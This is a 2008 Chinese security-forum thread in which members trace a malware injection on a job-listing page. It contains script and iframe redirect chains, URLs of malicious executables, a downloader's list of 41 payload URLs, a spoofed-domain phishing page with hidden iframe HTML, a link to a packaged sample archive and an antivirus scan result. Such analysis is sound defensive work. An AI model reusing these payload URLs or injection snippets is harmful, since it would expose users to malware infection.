hxxp://www.533800.com/job/showjobs.asp?id=104 [挂马] [by 深红的雪]

显示全部楼层 · 发表于 2008-12-17 23:11:56

老少边山穷都有人狠心下手

协助修改了标题 :-)
jimmyleo

[ 本帖最后由 jimmyleo 于 2008-12-19 12:33 编辑 ]

显示全部楼层 · 发表于 2008-12-17 23:48:28

http://www.iegif.com/01/Mete.exe

显示全部楼层 · 发表于 2008-12-18 01:38:46

Log is generated by FreShow.
[wide]http://www.533800.com/job/showjobs.asp?id=104
[script]http://c.nuclear3.com/css/c.js
      [frame]http://abcrot.cn/01/index.htm
         [frame]http://abcrot.cn/01/fl.htm
            [frame]http://abcrot.cn/01/i11.html
            [frame]http://abcrot.cn/01/f22.html
            [frame]http://abcrot.cn/01/i11.html
         [frame]http://abcrot.cn/01/cx.htm
         [frame]http://abcrot.cn/01/06014.htm
         [frame]http://abcrot.cn/01/I7.htm
            [frame]http://abcrot.cn/01/ix7.htm
         [frame]http://abcrot.cn/01/ff.htm
         [frame]http://abcrot.cn/01/xl.htm
         [frame]http://abcrot.cn/01/real10.htm
         [frame]http://abcrot.cn/01/real11.htm

挂了N个hxxp://c.nuclear3.com/css/c.js
            [object]http://www.iieeg.com/ie/Mete.exe
            [object]http://www.zmjjjyy.cn/new/a53.css
            [object]http://www.iegif.com/01/Mete.exe

显示全部楼层 · 发表于 2008-12-18 02:01:54

Mete.exe读取下载列表
http://www-17173.com/new.txt

[file]
open=y
url1=http://u3.www-pconline.com/ly/a4.exe
url2=http://u3.www-pconline.com/ly/a1.exe
url3=http://u3.www-pconline.com/ly/a3.exe
url4=http://u3.www-pconline.com/ly/a10.exe
url5=http://u3.www-pconline.com/ly/a40.exe
url6=http://u3.www-pconline.com/ly/a41.exe
url7=http://u3.www-pconline.com/ly/a25.exe
url8=http://u3.www-pconline.com/ly/a13.exe
url9=http://u3.www-pconline.com/ly/a26.exe
url10=http://u3.www-pconline.com/ly/a9.exe
url11=http://u3.www-pconline.com/ly/a35.exe
url12=http://u3.www-pconline.com/ly/a52.exe
url13=http://u3.www-pconline.com/ly/a23.exe
url14=http://u3.www-pconline.com/ly/a51.exe
url15=http://u3.www-pconline.com/ly/a8.exe
url16=http://u1.www-pconline.com/bm/c2.exe
url17=http://u1.www-pconline.com/bm/c1.exe
url18=http://u1.www-pconline.com/bm/c7.exe
url19=http://u1.www-pconline.com/bm/c4.exe
url20=http://u1.www-pconline.com/bm/c6.exe
url21=http://u1.www-pconline.com/bm/c8.exe
url22=http://u6.www-pconline.com/hm/b12.exe
url23=http://u6.www-pconline.com/hm/b17.exe
url24=http://u6.www-pconline.com/hm/b13.exe
url25=http://u6.www-pconline.com/hm/b15.exe
url26=http://u6.www-pconline.com/hm/b7.exe
url27=http://u6.www-pconline.com/hm/b45.exe
url28=http://u6.www-pconline.com/hm/b3.exe
url29=http://u6.www-pconline.com/hm/b10.exe
url30=http://u2.www-pconline.com/hm/b5.exe
url31=http://u2.www-pconline.com/hm/b8.exe
url32=http://u2.www-pconline.com/hm/b2.exe
url33=http://u2.www-pconline.com/hm/b4.exe
url34=http://u2.www-pconline.com/hm/b11.exe
url35=http://u2.www-pconline.com/hm/b9.exe
url36=http://u2.www-pconline.com/hm/b16.exe
url37=http://u2.www-pconline.com/hm/b1.exe
url38=http://u8.www-pconline.com/vip/aaa.exe
url39=http://u8.www-pconline.com/vip/cj.exe
url40=http://u5.www-pconline.com/vip/TestQ.exe
url41=http://u5.www-pconline.com/vip/vip.exe
count=41

谁来打包

显示全部楼层 · 发表于 2008-12-18 06:58:13

原帖由 深红的雪 于 2008-12-18 02:01 发表
Mete.exe读取下载列表
http://www-17173.com/new.txt

谁来打包

新建文件夹.rar (933.46 KB, 下载次数: 83)

显示全部楼层 · 发表于 2008-12-18 09:21:22

1 testq.exe 存在链接，下载的文本疑似新浪博客的跨站漏洞？然后继续挂马～
http://pic.bokec.net/update/wb.txt

我的博客开通啦，快去看看吧！
http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/

<iframe src=x.htm width=50 height=0 ></iframe>
<html>
<head>
<META HTTP-EQUIV=REFRESH CONTENT="3;URL=http://blog.sina.com.cn">
<title>blog.sina.com.cn,新浪网博客频道是全中国最主流，最具人气的博客频道。拥有最耀眼的娱乐明星博客、最知性的名人博客、最动人的情感博客，最自我的草根博客。</title>
</p>
</td>
</form>
</tr>
</table>
</body>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/882616/ystat.js"></script>
</html>

Log is generated by FreShow.
[wide]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/
[frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/x.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/fl.htm
         [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/i11.html
         [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/f22.html
         [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/i11.html
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/cx.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/06014.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/I7.htm
         [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/ix7.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/ff.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/xl.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/real10.htm
      [frame]http://Blog.sina.com.cn%2Eani3.cn/mikeo2008/real11.htm
         [object]http://www.iegif.com/vip/Mete.exe

显示全部楼层 · 发表于 2008-12-18 16:10:58

红伞Miss  0
The scan has been done completely.

   1 Scanning directories
   43 Files were scanned
   64 viruses and/or unwanted programs were found
   0 Files were classified as suspicious:
   41 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
-21 Files not concerned
   1 Archives were scanned
   0 Warnings
   41 Notes

[已鉴定] hxxp://www.533800.com/job/showjobs.asp?id=104 [挂马] [by 深红的雪]

回复 5楼 zjsxsycj 的帖子